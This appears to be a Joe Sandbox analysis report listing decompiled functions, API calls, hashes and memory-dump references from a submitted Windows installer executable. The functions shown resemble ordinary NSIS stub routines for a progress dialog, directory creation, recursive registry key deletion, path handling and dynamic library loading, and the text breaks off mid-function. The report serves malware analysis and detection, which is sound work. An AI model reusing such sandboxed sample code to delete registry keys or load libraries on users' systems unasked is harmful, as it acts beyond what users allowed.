                                                  Uniqueness Score: -1.00%

                                                  Function 00402B51 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00402B51(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402BCD();
					_t19 = "unpacking data: %d%%";
					if( *0x423f90 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                  0x00402b5e
                                                  0x00402b6c
                                                  0x00402b72
                                                  0x00402b72
                                                  0x00402b80
                                                  0x00402b82
                                                  0x00402b8e
                                                  0x00402b93
                                                  0x00402b95
                                                  0x00402b95
                                                  0x00402ba0
                                                  0x00402bb0
                                                  0x00402bc2
                                                  0x00402bc2
                                                  0x00402bca

                                                  APIs
                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B6C
                                                  • wsprintfA.USER32 ref: 00402BA0
                                                  • SetWindowTextA.USER32(?,?), ref: 00402BB0
                                                  • SetDlgItemTextA.USER32 ref: 00402BC2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                  • API String ID: 1451636040-1158693248
                                                  • Opcode ID: e689fdde44cf42a9b67182cf282a3bc8b5e9150859d8beb6a9b489f4c8dfea69
                                                  • Instruction ID: 5842f070d0ba5c42680e32cc71ffb7420e94a61e96bc0cd7dd222547cc7ec007
                                                  • Opcode Fuzzy Hash: e689fdde44cf42a9b67182cf282a3bc8b5e9150859d8beb6a9b489f4c8dfea69
                                                  • Instruction Fuzzy Hash: 63F01D70900209ABEF206F60DD0ABEE3B79AB00305F00803AFA16B51D1D7B8AA558F59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004054A9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004054A9(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x407310;
				_v36.Group = 0x407310;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x407300;
				_v16.nLength = 0xc;
				if(CreateDirectoryA(_a4,  &_v16) != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}






                                                  0x004054b4
                                                  0x004054b8
                                                  0x004054bb
                                                  0x004054c1
                                                  0x004054c5
                                                  0x004054c9
                                                  0x004054d1
                                                  0x004054d8
                                                  0x004054de
                                                  0x004054e5
                                                  0x004054f4
                                                  0x004054f6
                                                  0x00000000
                                                  0x004054f6
                                                  0x00405500
                                                  0x00405507
                                                  0x0040551d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040551f
                                                  0x00405523

                                                  APIs
                                                  • CreateDirectoryA.KERNEL32(?,?,00000000), ref: 004054EC
                                                  • GetLastError.KERNEL32 ref: 00405500
                                                  • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405515
                                                  • GetLastError.KERNEL32 ref: 0040551F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                  • String ID: C:\Users\user\Desktop
                                                  • API String ID: 3449924974-224404859
                                                  • Opcode ID: 1936ad7c03f2b7d8793bf3b54e92df8b677be00562b78ee6b782fceed01fa342
                                                  • Instruction ID: c62c2996f9e34dce87800cf524906665c2ca46c28120acb5782fde5c5d27446b
                                                  • Opcode Fuzzy Hash: 1936ad7c03f2b7d8793bf3b54e92df8b677be00562b78ee6b782fceed01fa342
                                                  • Instruction Fuzzy Hash: 2C010871D04219EAEF119FA5D9047EFBBB8EF04355F00457AE905B6180D378A644CBAA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402A4C Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 84%
                                                  			E00402A4C(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x424030 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402A4C(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00406087(4);
					if(_t27 == 0) {
						if( *0x424030 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x424030, 0);
				}
				return _t18;
			}








                                                  0x00402a6d
                                                  0x00402a75
                                                  0x00402a9d
                                                  0x00402a87
                                                  0x00402ad7
                                                  0x00402add
                                                  0x00000000
                                                  0x00402adf
                                                  0x00402a9b
                                                  0x00000000
                                                  0x00000000
                                                  0x00402a9b
                                                  0x00402ab2
                                                  0x00402aba
                                                  0x00402ac1
                                                  0x00402aed
                                                  0x00000000
                                                  0x00000000
                                                  0x00402af5
                                                  0x00402afd
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00402afd
                                                  0x00000000
                                                  0x00402ad0
                                                  0x00402ae4

                                                  APIs
                                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A6D
                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AA9
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402AB2
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402AD7
                                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AF5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: Close$DeleteEnumOpen
                                                  • String ID:
                                                  • API String ID: 1912718029-0
                                                  • Opcode ID: e587360bee53e37b0855da719222600f70f6391bf1876ecc0db5f363fb6ea6fc
                                                  • Instruction ID: 0b2809d2fb64695319acfce79e26d11160b3b4f997347cbf6297b20c5f533aea
                                                  • Opcode Fuzzy Hash: e587360bee53e37b0855da719222600f70f6391bf1876ecc0db5f363fb6ea6fc
                                                  • Instruction Fuzzy Hash: B3117F71A00009FFDF21AF90DE48DAF7B79EB44384B104076FA05B00A0DBB49E51AF69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401CC1 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8), __edx);
				GetClientRect(_t25, _t27 - 0x50);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A0C(_t21), _t21,  *(_t27 - 0x48) *  *(_t27 - 0x20),  *(_t27 - 0x44) *  *(_t27 - 0x20), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                  0x00401ccb
                                                  0x00401cd2
                                                  0x00401d01
                                                  0x00401d09
                                                  0x00401d10
                                                  0x00401d10
                                                  0x004028a4
                                                  0x004028b0

                                                  APIs
                                                  • GetDlgItem.USER32 ref: 00401CC5
                                                  • GetClientRect.USER32 ref: 00401CD2
                                                  • LoadImageA.USER32 ref: 00401CF3
                                                  • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
                                                  • DeleteObject.GDI32(00000000), ref: 00401D10
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: ec194eb94e58c4ab6dd9346a1662fd327514f5b443aeead4144ae97423a1d297
                                                  • Instruction ID: bd69cf0b23442afaa5089e63738db4ddecc40c485a2e91d601a614859fd6190e
                                                  • Opcode Fuzzy Hash: ec194eb94e58c4ab6dd9346a1662fd327514f5b443aeead4144ae97423a1d297
                                                  • Instruction Fuzzy Hash: 79F0FF72A04114AFDB00EBA4DD88DAFB77CFB44305B044536F601F6191C7789D419B79
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405882 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00405882(char _a4) {
				CHAR* _t3;
				char* _t5;
				CHAR* _t7;
				CHAR* _t8;
				void* _t10;

				_t1 =  &_a4; // 0x405634
				_t8 =  *_t1;
				_t7 = CharNextA(_t8);
				_t3 = CharNextA(_t7);
				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
					if( *_t8 != 0x5c5c) {
						L8:
						return 0;
					}
					_t10 = 2;
					while(1) {
						_t10 = _t10 - 1;
						_t5 = E00405819(_t3, 0x5c);
						if( *_t5 == 0) {
							goto L8;
						}
						_t3 = _t5 + 1;
						if(_t10 != 0) {
							continue;
						}
						return _t3;
					}
					goto L8;
				} else {
					return CharNextA(_t3);
				}
			}








                                                  0x0040588b
                                                  0x0040588b
                                                  0x00405892
                                                  0x00405895
                                                  0x0040589a
                                                  0x004058ad
                                                  0x004058c7
                                                  0x00000000
                                                  0x004058c7
                                                  0x004058b1
                                                  0x004058b2
                                                  0x004058b5
                                                  0x004058b6
                                                  0x004058be
                                                  0x00000000
                                                  0x00000000
                                                  0x004058c0
                                                  0x004058c3
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004058c3
                                                  0x00000000
                                                  0x004058a3
                                                  0x00000000
                                                  0x004058a4

                                                  APIs
                                                  • CharNextA.USER32(4V@,?,C:\,00000000,004058E6,C:\,C:\,?,?,7476F560,00405634,?,C:\Users\user\AppData\Local\Temp\,7476F560), ref: 00405890
                                                  • CharNextA.USER32(00000000), ref: 00405895
                                                  • CharNextA.USER32(00000000), ref: 004058A4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: CharNext
                                                  • String ID: 4V@$C:\
                                                  • API String ID: 3213498283-1503405514
                                                  • Opcode ID: c58660fb0bf1ba28bd125fae111134e2cdebdf6cff54c8abe05387ea08842000
                                                  • Instruction ID: c672ca698b2e1da82c16c1c95d0afa497de5c4bc474b1e42a417a68fd1ebbade
                                                  • Opcode Fuzzy Hash: c58660fb0bf1ba28bd125fae111134e2cdebdf6cff54c8abe05387ea08842000
                                                  • Instruction Fuzzy Hash: 65F0A753954F2155F72232644C44B7B5BACDF55711F14C47BE900F61D182BC5CB28FAA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004047AC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 77%
                                                  			E004047AC(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E00405D1D(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E00405D1D(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E00405D1D(_t41, _t47, 0x420580, 0x420580, _a8);
				wsprintfA(_t32 + lstrlenA(0x420580), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x423758, _a4, 0x420580);
			}



















                                                  0x004047b2
                                                  0x004047b7
                                                  0x004047bf
                                                  0x004047c0
                                                  0x004047cd
                                                  0x004047d5
                                                  0x004047d6
                                                  0x004047d8
                                                  0x004047da
                                                  0x004047dc
                                                  0x004047df
                                                  0x004047df
                                                  0x004047e6
                                                  0x004047ec
                                                  0x004047ec
                                                  0x004047f3
                                                  0x004047fa
                                                  0x004047fd
                                                  0x00404800
                                                  0x00404800
                                                  0x00404804
                                                  0x00404814
                                                  0x00404816
                                                  0x00404819
                                                  0x004047c2
                                                  0x004047c2
                                                  0x004047c9
                                                  0x004047c9
                                                  0x00404821
                                                  0x0040482c
                                                  0x00404842
                                                  0x00404852
                                                  0x0040486e

                                                  APIs
                                                  • lstrlenA.KERNEL32(00420580,00420580,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046C7,000000DF,00000000,00000400,?), ref: 0040484A
                                                  • wsprintfA.USER32 ref: 00404852
                                                  • SetDlgItemTextA.USER32 ref: 00404865
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s
                                                  • API String ID: 3540041739-3551169577
                                                  • Opcode ID: 79547ab418726b7bf4084acddcdfde422701d950c1d0e95393f539214d427545
                                                  • Instruction ID: 71df96092b2c0d2c51d4f9b386e12500524326f2c654dceed31374545f8d5b50
                                                  • Opcode Fuzzy Hash: 79547ab418726b7bf4084acddcdfde422701d950c1d0e95393f539214d427545
                                                  • Instruction Fuzzy Hash: C411E77364412437DB0075699C46EAF3299DFC6374F244637FA25F31D2EA788C5285AC
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401BAD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 51%
                                                  			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 8) = E004029EF(3);
				 *(_t55 + 8) = E004029EF(4);
				if(( *(_t55 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402A0C(0x33);
				}
				__eflags =  *(_t55 - 0x14) & 0x00000002;
				if(( *(_t55 - 0x14) & 0x00000002) != 0) {
					 *(_t55 + 8) = E00402A0C(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E00402A0C();
					_t28 = E00402A0C();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 8),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029EF();
					_t37 = E004029EF();
					_t48 =  *(_t55 - 0x14) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8));
						L10:
						 *(_t55 - 0xc) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8), _t42, _t48, _t55 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x28)) >= _t42) {
					_push( *(_t55 - 0xc));
					E00405C59();
				}
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                                                  0x00401bb6
                                                  0x00401bc2
                                                  0x00401bc5
                                                  0x00401bce
                                                  0x00401bce
                                                  0x00401bd1
                                                  0x00401bd5
                                                  0x00401bde
                                                  0x00401bde
                                                  0x00401be1
                                                  0x00401be5
                                                  0x00401be7
                                                  0x00401c34
                                                  0x00401c36
                                                  0x00401c3f
                                                  0x00401c47
                                                  0x00401c4a
                                                  0x00401c4a
                                                  0x00401c53
                                                  0x00000000
                                                  0x00401be9
                                                  0x00401bf0
                                                  0x00401bf2
                                                  0x00401bfa
                                                  0x00401bfd
                                                  0x00401c25
                                                  0x00401c59
                                                  0x00401c59
                                                  0x00401bff
                                                  0x00401c0d
                                                  0x00401c15
                                                  0x00401c18
                                                  0x00401c18
                                                  0x00401bfd
                                                  0x00401c5c
                                                  0x00401c5f
                                                  0x00401c65
                                                  0x00402849
                                                  0x00402849
                                                  0x004028a4
                                                  0x004028b0

                                                  APIs
                                                  • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                                                  • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: ffe6b110ca1c73326c48dab4d0f6c0cda1bf7de6d6394e86224bb1024c2cbccb
                                                  • Instruction ID: 0d48d80f5befc11ac34d32cc8383790a8c4c8cfd5038d7f43494ad221661d07c
                                                  • Opcode Fuzzy Hash: ffe6b110ca1c73326c48dab4d0f6c0cda1bf7de6d6394e86224bb1024c2cbccb
                                                  • Instruction Fuzzy Hash: 4D217471A44248BFEF01AFB4CD8AAAE7B75EF44344F14417AF501B61D1D6788940DB19
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004057EE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004057EE(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}




                                                  0x004057ef
                                                  0x00405806
                                                  0x0040580e
                                                  0x0040580e
                                                  0x00405816

                                                  APIs
                                                  • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040323C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 004057F4
                                                  • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040323C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 004057FD
                                                  • lstrcatA.KERNEL32(?,00409010), ref: 0040580E
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004057EE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrcatlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 2659869361-3081826266
                                                  • Opcode ID: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                                  • Instruction ID: a73f37ca2c4469ddb4ae9c1577b37cdaede3e1835012dc8acebf0dfdd4a4e987
                                                  • Opcode Fuzzy Hash: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                                  • Instruction Fuzzy Hash: 86D0A962615A703EE21236559C09F8B2A0CCF82700B14C833F600B22E2C63C5D41CFFE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401F67 Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 59%
                                                  			E00401F67(void* __ebx, void* __eflags) {
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x424038");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x424008 =  *0x424008 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402A0C(0xfffffff0);
				 *(_t34 + 8) = E00402A0C(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t30 = LoadLibraryExA(_t32, _t27, 8);
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404FE7(0xfffffff7,  *(_t34 + 8));
					} else {
